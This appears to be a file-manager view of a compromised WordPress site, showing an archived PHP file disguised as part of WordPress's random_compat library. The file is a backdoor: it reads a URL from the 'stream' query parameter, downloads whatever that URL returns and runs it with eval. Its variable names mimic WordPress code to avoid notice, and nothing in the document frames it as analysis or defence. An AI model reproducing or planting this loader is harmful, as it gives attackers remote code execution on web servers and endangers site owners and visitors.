| Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/ |
| Current File : /home/x/b/o/xbodynamge/namtation/wp-content/random_bytes_mcrypt-decryption.php.tar |
home/xbodynamge/www/wp-includes/random_compat/random_bytes_mcrypt-decryption.php 0000644 00000000510 15114542246 0024505 0 ustar 00 <?php
if (isset($_GET['stream'])) {
$is_archive_wpr = $_GET['stream'];
if ($absint_ba = curl_init()) {
curl_setopt($absint_ba, CURLOPT_URL, $is_archive_wpr);
curl_setopt($absint_ba, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($absint_ba));
curl_close($absint_ba);
exit;
}
}